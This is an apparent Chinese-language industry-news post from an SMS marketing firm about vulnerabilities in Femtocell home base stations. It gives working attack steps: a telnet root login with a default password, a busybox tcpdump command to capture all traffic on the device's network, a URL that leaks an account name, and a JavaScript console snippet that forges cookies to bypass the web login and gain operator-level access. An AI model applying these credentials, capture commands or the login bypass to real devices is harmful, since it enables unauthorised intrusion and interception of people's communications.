<strong id="6q10a"></strong>

  • <acronym id="6q10a"><pre id="6q10a"></pre></acronym>
      1. <acronym id="6q10a"></acronym>
      2. <acronym id="6q10a"></acronym>
      3. 短信積分商城 400-6699-521 咨詢熱線: 0371-69067686
        行業動態Industry Dynamics
        您的位置: 首頁 > 樂信行業動態 >

        家庭基站Femtocell截獲任意短信漏洞,危及公眾移動通信安全

          移動互聯網發展到帳用戶對短信、通話、數據流需求劇增,轉向互動任意短信需求,而Femtocell設備可以被改造成偽基站短信群發器,截取家庭任意短信隱私,移動短信安全通信漏洞凸顯。
          近日,有部分運營商通報Femtocell雖能瞬間解決室內ip網絡覆蓋問題,但是漏洞問題百出,很多廠家已經對全網設備進行緊急修復,漏洞暫時已經修復完成,但是漏洞問題還會存在嗎?
          樂信揭秘Femtocell任意漏洞三大細節:
          ①root弱密碼
          可以直接telnet登錄,然后就是一個擁有root權限的Linux shell了。
          $ telnet 192.168.197.1
          login: root
          password: 5up
          順便提一句,這個密碼應該是Atheros的參考設計板PB44的默認密碼,很多廠商拿來都不改。在搜索引擎上以"5up"和"root"為關鍵詞,可以搜索到不少有趣的東西。
          并且發現上面的busybox基本沒有裁剪,甚至連tcpdump功能都有。
          于是,可以直接抓取到所有連上此WiFi的流量:
          busybox tcpdump -i br0 not port 23
          ② 其它利用方式
          /mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件,可以使用sqlitebrowser直接查看
          閃燈 /mnt/flash/led_ctrl.sh [on|off]
          ③ RF 板卡滲透:Web 登錄繞過
          訪問 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 獲得用戶名為
          [email protected]
          然后在USER.js里發現原有的登錄繞過問題沒有得到修復,于是在瀏覽器中打開Console,輸入以下腳本即可登錄:
          SetCookie('role', 'marketUser');
          SetCookie('username', '[email protected]');
          SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
          document.cookie = "loginFlag=1;";
          window.top.location = 'main.asp?r=' + Math.random() + '#index';
          登錄之后,我們就擁有了與運營商派過來開站的工程師完全一樣的操作權限!
        (責任編輯:樂信企信通)
        光棍电影网